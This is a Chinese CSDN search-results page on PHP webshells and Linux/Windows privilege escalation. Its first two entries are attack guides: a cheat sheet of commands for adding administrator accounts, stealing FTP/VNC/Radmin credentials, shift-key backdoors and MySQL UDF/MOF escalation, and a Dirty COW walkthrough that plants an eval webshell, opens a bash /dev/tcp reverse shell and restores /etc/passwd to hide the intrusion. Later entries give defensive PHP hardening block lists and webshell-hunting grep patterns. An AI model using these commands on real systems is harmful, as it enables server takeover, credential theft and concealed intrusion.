php木马linux提权_linux提权木马 - CSDN
精华内容
参与话题
  • webshell提权

    千次阅读 2018-09-11 22:45:25
    提权 提权前奏 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限 通常所处的权限:  ASP/PHP 匿名权限 ASPX USER权限 JSP 通常是系统权限 收集信息:...

    提权

    提权前奏

    • 提权:主要是针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得服务器权限
    • 通常所处的权限: 
      • ASP/PHP 匿名权限
      • ASPX USER权限
      • JSP 通常是系统权限
    • 收集信息: 
      • 内外网
      • 服务器系统和版本位数
      • 服务器的补丁情况
      • 服务器的安装软件情况
      • 服务器的防护软件情况
      • 端口情况
      • 支持脚本情况
      • 。。。。。。
    • 信息收集常用命令 
      • windows:
      • ipconfig /all:查看当前ip
      • net user:查看当前服务器账号情况
      • netstat -ano:查看服务器端口开启情况
      • ver:查看当前服务器操作系统
      • systeminfo:查看当前服务器配置情况(补丁情况)
      • tasklist -PID pid号:结束某个pid号的进程
      • taskkill /im qq.exe /f:结束QQ进程
      • net user x 123123 /add:添加一个名为x密码为123123的用户
      • net localgroup administrators x /add:将用户x添加到管理员组
      • whoami:查看当前操作用户(当前权限)
      • linux:
      • ls -al:查看当前目录下的文件和文件夹
      • pwd:查看当前操作路径
      • uname -a:查看当前服务器内核信息
    • cmd无法执行 
      • 原因:
      • 防护软件拦截
      • cmd被降级
      • 组件被删除
      • 办法:找可读写目录上传cmd.exe,将执行的cmd.exe路径替换成上传的路径,再次调用执行
    • 查找3389端口 
      • 注册表读取
      • 工具扫描
      • 命令探针

    第三方软件提权

    server -u 提权

    • 有修改权限 
      • 检查是否有可写权限 修改server -u 默认安装目录下的ServUDaemon.ini
      • 增加用户
      • 连接
      • 执行命令:
      • quote site exec net user x 123123 /add
      • quote site exec net localgroup administrators x /add
    • 无修改权 
      • 暴力破解md5
    • 溢出提权

    pcanywhere提权

    • 访问pcanywhere默认安装目录
    • 下载用户配置文件
    • 通过破解账户密码文件

    Radmin提权

    • 通过端口扫描,扫面4899端口
    • 上传radmin.asp木马读取radmin的加密密文
    • 使用工具连接

    VNC提权

    • 通过读取注册表十进制数
    • 将得出的十进制数去掉第一个数,其他的转换成十六进制数
    • 破解十六进制数得到密码
    • vnc4.exe -W 回车
    • 输入转换后的十六进制数
    • 连接VNC

    g6ftp提权

    • 下载管理配置文件,将administrar管理密码破解
    • 使用lcx端口转发(默认只允许本机连接)
    • lcx.exe -tran 8027 127.0.0.1 8021
    • 使用客户端以管理员用户登录
    • 创建用户并设置权限和执行的批处理文件
    • 上传批处理
    • 以创建的普通用户登录ftp
    • 执行命令 quote site x.bat
    • x.bat 内容为添加系统用户,提权

    破解hash提权

    • 上传pwdump.exe 运行获取hash值
    • 拿到lc5、彩虹表中破解,即可得到管理员密码

    360本地提权(09年)

    • 上传cmd.exe和360.exe
    • 运行360.exe
    • 生成五次shift后门

    flashfxp提权

    • 下载quick.dat文件
    • 覆盖替换到本地
    • 获取网站管理密码

    FileZilla提权

    • filezilla是一款开源的FTP服务器和客户端的软件
    • 若安装了服务器端默认只侦听127.0.0.1的14147端口
    • 并且默认安装目录目录下有两个敏感文件filezillaserver.xml(包含了用户信息)和filezillaserver interface.xml(包含了管理信息)
    • 提权思路: 
      • 下载这两个文件拿到管理密码
      • 配置端口转发,登录远程管理ftpserve。创建ftp用户
      • 分配权限,设置家目录为C:\
      • 使用cmd.exe改名为sethc.exe,替换c:\windows\system32\sethc.exe生成shift后门
      • 连接3389按5次shift调出cmd.exe

    搜狗输入法提权

    • 找到搜狗输入法安装目录,上传组件
    • 覆盖搜狗输入法调用的组件
    • 当管理员使用搜狗输入法时,组件被调用,账号创建完成

    pr提权

    • 上传pr.exe
    • 运行
    • pr.exe “net user”

    巴西烤肉提权

    • 与pr一样

    启动项提权

    • 前提写入的目录需要写入权限
    • 将批处理文件上传到开机启动项目录,等待管理员重启

    数据库提权

    MSSQL提权

    • 步骤 
      • 安装组件
      • 开启3389
      • 创建用户
      • 提升权限
    • 安装cmd_shell组件 
      • EXEC sp_configure ‘show advance options’,1
      • GO
      • RECONFIGURE
      • GO
      • EXEC sp_configure ‘xp_cmdshell’,0
      • GO
      • RECONFIGURE
      • GO

    MySQL数据库提权

    UDF提权

    • 原理:通过root权限导出duf.dll到系统目录下,可以通过udf.dll调用执行cmd

    • 获取对方的mysql数据库下的root账号密码:

      • 查看网站源码里面的数据库配置文件(inc,conn,config,sql,common,data等)
      • 查看数据库安装路径下的user.myd(/data/mysql)
      • 暴力破解 mysql密码破解 3306端口入侵
    • 导出duf.dll

      • C:\Winnt\udf.dll 2000
      • C:\Windows\udf.dll 2003
      • 5.1以上版本需要导出到mysql安装目录lib\plugin\
      • create function cmdshell returns string soname ‘udf.dll’
      • select cmdshell(‘net user x 123123 /add’);
      • select cmdshell(‘net localgroup administrators x /add’);
      • drop function cmdshell; 删除函数

    启动项提权

    • 拿到root权限

    • 查看数据库中有什么表 show tables;

    • 在TEST数据库中建立一个新表 create table a (cmd text);
    • 在表中插入内容: 
      • insert into a values ("set wshshell=createobject(""wscript.shell"")");
      • insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1 /add"",0)");
      • insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0)");
      • 这三条命令会建立一个VBS的脚本程序
    • 查看表a内容 ·select * from a
    • 表a中确定是插入的三条数据后,输出表为一个VBS的脚本文件 `select * from a into outfile “c://docume~1//administrator//开始菜单//程序//启动//a.vbs”;
    • 重启

    MOF提权

    • 第一种方法: 
      • 上传mof.php。输入相关信息,执行命令,完成提权
    • 第二种方法: 
      • 上传文件x.mof
      • 使用select命令导出到正确位置 select load_file(C:/wmpub/nullevt.mof) into dumpfile "C:/windows/system32/wbem/mof/nullevt.mof";
      • 允许外部地址使用root用户连接的sql语句 grant all privileges on *.* to 'root'@'%' identified by 'kdm001' with grant option;

    反弹端口提权

    • 利用mysql客户端工具连接mysql服务器。然后执行下面的操作: 
      • mysql.exe -h ip -uroot -p
      • enter password
      • mysql>\.c:\mysql.txt;
      • mysql>select backshell("IP",2010);
      • 本地监听你反弹的端口 nc.exe -vv -i -p 2010
      • 成功后,将获得一个system权限的cmdshell。

    linux溢出提权

    linux提权

    • uname -r 查看系统内核版本
    • 找到对应的内核版本的exp
    • 上传–>编译–>运行

    3389

    开启3389

    • 使用 
      • 批处理开3389
      • 使用sql语句开3389
      • 使用exe开3389
      • 使用VB开3389

    嗅探3389和http登陆的密码

    • wireshark
    • cain
    展开全文
  • Linux利用脏牛漏洞提权

    千次阅读 2020-03-11 08:26:04
    1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpphp 2.启动http,进入etc/init.d目录,输入:./httpd start 3.关掉selinux,输入:setenforce 0 4.在var/www/html目录下...

    实验环境:Centos6.5、ssh

    实验步骤:

    一、搭建实验环境

    1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpd php

    2.启动http,进入etc/init.d目录,输入:./httpd start

    3.关掉selinux,输入:setenforce 0

    4.在var/www/html目录下写一个一句话木马文件,内容为:<?php @eval($_REQUEST[666]);?>

    二、进行提权

    1.利用中国菜刀连接Centos,打开虚拟终端

    2.获取交互式shell,输入:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,并在cmd中利用nc开启监听的端口号,交互成功

    3.利用uname -a命令查看系统的内核系统

    4.从网上查找与该系统相对应的漏洞,这里用脏牛漏洞实现提权,从github上下载脏牛,下载链接:https://github .com/FireFart/dirtycow

    5.将该exp利用菜刀上传至tmp目录下(该目录可读可写可执行)

    6.进入tmp目录下进行编译:gcc -pthread dirty.c -o dirty -lcrypt(注意:如果linux上没有安装gcc,我们可以另找一台机器,最好内核和操作系统版本,系统位数都和目标机一致),编译之后会出现一个新文件

    7.执行该文件,输入:./dirty  123456会创建一个firefart用户,密码是123456(就是root用户)

    8.使用firefart用户进行远程登录

    9.创建新用户xx,输入useradd xx,并将该用户添加到管理员组:gpasswd -a xx wheel

    10.修改配置文件:vi /etc/sudoers,将105行注释去掉,此时xx也有了root权限,实现了提权

    11.防止被发现,将自动备份的/tmp/passwd.bak覆盖etc/passwd,输入:mv /tmp/passwd.bak /etc/passwd,即可恢复之前的root权限

     

     

    展开全文
  • 1.防止跳出web目录 ...如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如 你的web目录是/usr /local/apache/htdocs,那么在httpd.conf里加上这么几行: ...
    1.防止跳出web目录

    首先修改httpd.conf:

    如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如

    你的web目录是/usr /local/apache/htdocs,那么在httpd.conf里加上这么几行:

    php_admin_value open_basedir /usr/local/apache/htdocs

    这样,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许。

    但经过这样修改后,关于php文件上传会受到影响,笔者曾经为此痛苦过。后来终于找到了

    http://blog.sina.com.cn/s/blog_606607470100g5f0.html文章中的方法,文章内容如下:

    为了安全,我们通常会在虚拟主机设置中,加入这一行

    php_admin_value open_basedir “/usr/local/apache/htdocs/www”

    但这会导致move_uploaded_file不能读取临时目录中的上传文件,导致上传文件失失败。

    一般会提示以下错误:

    Warning: move_uploaded_file() [function.move-uploaded-file]: open_basedir restriction in

    effect. File(/tmp/phpqwg5rO) is not within the allowed path(s): (/usr/local/apache/htdocs/www)

    in /usr/local/apache/htdocs/www/includes/lib_common.php on line 3130

    解决方法:

    将上传文件的临时目录加入到php_admin_value open_basedir后面,最后看起来是这样的:

    php_admin_value open_basedir “/usr/local/apache/htdocs/www:/tmp”

    注意:两个目录之间是冒号隔开(Linux中)。

    如果是Windows中,将冒号换成分号:

    php_admin_value open_basedir “d:/www/mysite;c:/windows/temp”

    2.防止php木马执行webshell

    打开safe_mode,

    在,php.ini中设置

    disable_functions= passthru,exec,shell_exec,system

    二者选一即可,也可都选

    3.防止php木马读写文件目录

    在php.ini中的

    disable_functions= passthru,exec,shell_exec,system

    后面加上php处理文件的函数

    主要有

    fopen,mkdir,rmdir,chmod,unlink,dir

    fopen,fread,f*lose,fwrite,file_exists

    closedir,is_dir,readdir.opendir

    fileperms.copy,unlink,delfile

    即成为

    disable_functions= passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir

    ,fopen,fread,fclose,fwrite,file_exists

    ,closedir,is_dir,readdir.opendir

    ,fileperms.copy,unlink,delfile,phpinfo

    ok,大功告成,php木马拿我们没辙了,^_^

    重启httpd服务,/usr/local/apache/bin/apachectl restart

    遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。

    4、其他

    找到”display_errors=on”改为”display_errors=off”

    一般php在没有连接到数据库或者其他情况下会有提示错误,一般错误信息中会包含php脚本当前的路径信

    息或者查询的SQL语句等信息,这类信息提供给黑客后,是不安全的,所以一般服务器建议禁止错误提示 。

    查找:magic_quotes_gpc 如果是Off的话改成On

    打开magic_quotes_gpc来防止SQL注入。

    查找:open_basedir 后面增加 /www/ /*说明:www为网站程序所放文件*/

    这个选项可以禁止指定目录之外的文件操作,还能有效地消除本地文件或者是远程文件被include()等函

    数的调用攻击。

    expose_php设为off ,这样php不会在http文件头中泄露信息。

    我们为了防止黑客获取服务器中php版本的信息,可以关闭该信息斜路在http头中 。

    设置“allow_url_fopen”为“off” 这个选项可以禁止远程文件功能 。

    下面的没有测试

    如果是在windos平台下搭建的apache我们还需要注意一点,apache默认运行是system权限,这很恐怖,这让

    人感觉很不爽.那我们就给 apache降降权限吧.

    net user apache ****microsoft /add

    net localgroup users apache /del

    ok.我们建立了一个不属于任何组的用户apche.

    我们打开计算机管理器,选服务,点apache服务的属性,我们选择log on ,选择this account ,我们填入上

    面所建立的账户和密码, 重启apache服务,ok,apache运行在低权限下了.

    实际上我们还可以通过设置各个文件夹的权限,来让apache用户只能执行我们想让它能干的事情,给每一个

    目录建立一个单独能读写的用户.这也是当前很多虚拟主机提供商的流行配置方法哦,不过这种方法用于防止这

    里就显的有点大材小用了。
    展开全文
  • Linux shell快速查找PHP木马

    千次阅读 2014-08-21 10:10:53
    一句话查找 PHP 木马 find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc"> /tmp/php.txt grep -r --include=*.php '[^a-z]eval($_POST' . > /tmp/...
    
    

    一句话查找 PHP 木马

    find ./ -name "*.php" |xargs egrep "phpspy|c99sh|milw0rm|eval\(gunerpress|eval\(base64_decoolcode|spider_bc"> /tmp/php.txt
    grep -r --include=*.php  '[^a-z]eval($_POST' . > /tmp/eval.txt
    grep -r --include=*.php  'file_put_contents(.*$_POST\[.*\]);' . > /tmp/file_put_contents.txt
    find ./ -name "*.php" -type f -print0 | xargs -0 egrep "(phpspy|c99sh|milw0rm|eval\(gzuncompress\(base64_decoolcode|eval\(base64_decoolcode|spider_bc|gzinflate)" | awk -F: '{print $1}' | sort | uniq
    查找最近一天被修改的 PHP 文件

    find -mtime -1 -type f -name \*.php
    修改网站的权限

    find -type f -name \*.php -exec chmod 444 {} \;
    find ./ -type d -exec chmod 555{} \;


    网站源码下载

    展开全文
  • 一句话木马拿shell原理及菜刀的使用

    万次阅读 2018-04-12 21:01:33
    一、一句话木马 原理 1.以PHP举例 php的eval()函数:eval($str)函数是把$str当做PHP代码执行。 比如: &lt;?php $a = 233; $str = "echo $a;"; eval($str); ?&gt; 输出结果:233 ...
  • msfvenom Options: -p, –payload 指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用& #039;-& #039;或者stdin指定 -l, –list [module_type] 列出指定模块的所有可用资源....
  • linux/php一句话图片马及实例

    千次阅读 2018-09-24 10:54:55
    准备一张图片tu.jpeg、phpinfo.php和hack.php; Phpinfo.php文件内容: hack.php文件内容: 准备一个16进制软件UE(UltraEdit),linux下载地址:https://www.cr173.com/soft/265552.html 以及装有hackbar的火狐...
  • linux服务器上查杀webshell木马方法

    千次阅读 2018-07-18 13:52:39
    *.php" -type f -mtime -3 -exec ls -l {} \; 当然,结果中可能会包含很多cache类文件,这些文件不是我们要查找的,那么就需要把这类文件从查询结果中排除掉,往往cache文件都存放到cache特定的目录。 使用 -...
  • Metasploit(msf)系列-木马生成

    万次阅读 多人点赞 2018-09-28 10:45:35
    利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。 msfvenom命令行选项如下: Options:  -p, --payload &lt;payload&gt; 指定需要使用的payload...
  • 上传一句话木马拿shell教程

    千次阅读 2019-03-21 17:42:49
    一句话木马: <?php @eval($_POST['pass']);?> ASP: <%eval request("pass")%> ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%> 原理: php的...
  • MSF生成一个木马与使用

    千次阅读 2019-03-29 23:12:34
    利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。 准备: 目标:win7 x64专业版 攻击主机:Kali IP:192.168.1.143 生成: 生成test.exe木马文件 Step1...
  • mysql写入一句话木马

    千次阅读 2018-07-16 17:51:15
    前提: root权限,知道了服务器的web的绝对路径,尝试写入一句话 mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?...D:\Wamp\2.php"...D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2....
  • Web安全-一句话木马

    万次阅读 多人点赞 2020-05-08 20:49:53
    在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: &amp...
  • linuxphp木马、后门查杀总结

    千次阅读 2011-12-02 10:10:31
    Web Server(Nginx为例) 1、为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多个程序池达到隔离效果) 2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤) 3、path_info漏洞修正:...
  • eval函数简介与PHP一句话木马剖析

    万次阅读 2016-05-12 10:10:50
    eval函数简介与PHP一句话木马剖析    大家好我是Carol,我的QQ是:906871417 一:eval函数 二:eval函数的一般用法 三:eval函数的特殊用法 四:php一句话挂马的原理 五:禁用eval函数   一:eval...
  • 往目标web服务器上传相应的一句话木马 asp一句话木马: &amp;amp;lt;%execute(request(&amp;quot;pass&amp;quot;))%&amp;amp;gt; php一句话木马: &amp;amp;lt;?php @eval($_POS
  • Linux下通过WebShell反弹Shell的技巧

    千次阅读 2010-10-27 18:00:00
    Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法利用。因此必须要反弹一个Shell命令行窗口,在...
  • 一句话查找PHP木马 # find ./ -name “*.php” |xargs egrep “phpspy|c99sh|milw0rm|eval(gunerpress|eval(base64_decoolcode|spider_bc))” > /tmp/php.txt # grep -r –include=*.php ‘[^a-z]eval($_POST...
  • linux应急响应总结

    万次阅读 2020-10-14 17:27:06
    rookithunter可以自动化检查主机上可能存在的rookit木马文件,与被篡改的命令等,找到被篡改的命令后可以选择删除命令,然后重新安装命令。 参考: 后门和漏洞在Linux中使用“Rootkit Hunter rootkit后门检查工具...
  • MySQL注入之木马上传拿webshell

    万次阅读 2017-08-16 16:35:53
    原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and...
1 2 3 4 5 ... 20
收藏数 5,231
精华内容 2,092
关键字:

php木马linux提权